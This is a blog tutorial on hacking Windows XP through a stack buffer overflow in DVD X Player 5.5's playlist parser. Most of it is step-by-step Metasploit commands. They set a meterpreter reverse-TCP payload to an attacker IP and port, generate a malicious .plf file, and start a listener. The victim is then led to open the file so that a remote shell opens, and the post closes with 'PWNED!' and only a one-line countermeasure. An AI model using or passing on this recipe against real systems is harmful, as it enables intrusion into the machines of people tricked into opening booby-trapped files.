• 26,952
  • +1,026
  • 3,065
6 Step Hacking Windows XP SP 3 via DVD X Player 5.5 .plf Playlist Buffer Overflow

6 Step Hacking Windows XP SP 3 via DVD X Player 5.5 .plf Playlist Buffer Overflow

Bookmark

Type : Tutorial

Level : Medium

Victim O.S : Windows XP SP 3

Victim Vulnerable Application : DVD X Player 5.5

Attacker O.S : Backtrack 5 R1

Today in this tutorial we will learn & try to exploit the vulnerability found in DVD X Player v5.5. Actually this vulnerability  exposed in packetstormsecurity.org at September 1, 2011 but I'm just have time to make tutorial today ๐Ÿ˜› . FYI this vulnerability status still zeroday a.k.a no cure.

According to description in the metasploit exploit module ,

This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and Standard.  By supplying a long string of data in a plf file (playlist), the MediaPlayerCtrl.dll component will attempt to extract a filename out of the string, and then copy it on the stack without any proper bounds checking, which casues a buffer overflow, and results arbitrary code execution under the context of the user.This module has been designed to target common Windows systems such as: Windows XP SP2/SP3, Windows Vista, and Windows 7.

Now let's try to exploit this vulnerability

Requirements :

1. Metasploit Framework

2. DVD X Player v5.5

http://www.dvd-x-player.com/download.html

Step by Step :

1. Open your terminal window(CTRL + ALT + T) and type msfconsole command to use metasploit framework console mode.

2. Use the dvdx_plf_bof exploit from metasploit database, if your metasploit framework didn't have this exploit, try to do msfupdate command to update your metasploit framework.

use exploit windows/fileformat/dvdx_plf_bof

set payload windows/meterpreter/reverse_tcp

6 Step Hacking Windows XP SP 3 via DVD X Player 5.5 .plf Playlist Buffer Overflow

3. There are 3 switch available for this exploit module, but if you want to see clearly available switch just run show options command.

6 Step Hacking Windows XP SP 3 via DVD X Player 5.5 .plf Playlist Buffer Overflow

Informations :

set filename action-movie.plf --> set the filename to be generated by this exploit module

set lhost 192.168.8.90 --> set the local attacker IP to handle the payload

set lport 443 --> set the local attacker port to handle the payload

exploit --> generate the malicious plf file

4. Now after the malicious file been generated, we need to set up the handler / listener to handle the payload in our attacker machine.

6 Step Hacking Windows XP SP 3 via DVD X Player 5.5 .plf Playlist Buffer Overflow

Informations :

use exploit/multi/handler --> use the handler module to handle the payload request

set payload windows/meterpreter/reverse_tcp --> use the same with the exploit you've been set up before

set lhost 192.168.8.90 --> set your local attacker ip address to handle payload

set lport 443 --> set your local port to handle payload

exploit --> start the listener

5. Now, you need to make sure the user opened the malicious file in their DVD X Player and wait. Below was the screenshot when the user opened our malicious file.

6 Step Hacking Windows XP SP 3 via DVD X Player 5.5 .plf Playlist Buffer Overflow

6. As soon after they open our malicious file, now we get something in our console

6 Step Hacking Windows XP SP 3 via DVD X Player 5.5 .plf Playlist Buffer Overflow

PWNED!

Countermeasure :

1. Until now(9/3/11) when I'm wrote this tutorial the status still zeroday. a.k.a still no cure, just wait until this website http://www.dvd-x-player.com/download.html announce new version.

Hope you enjoyed ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com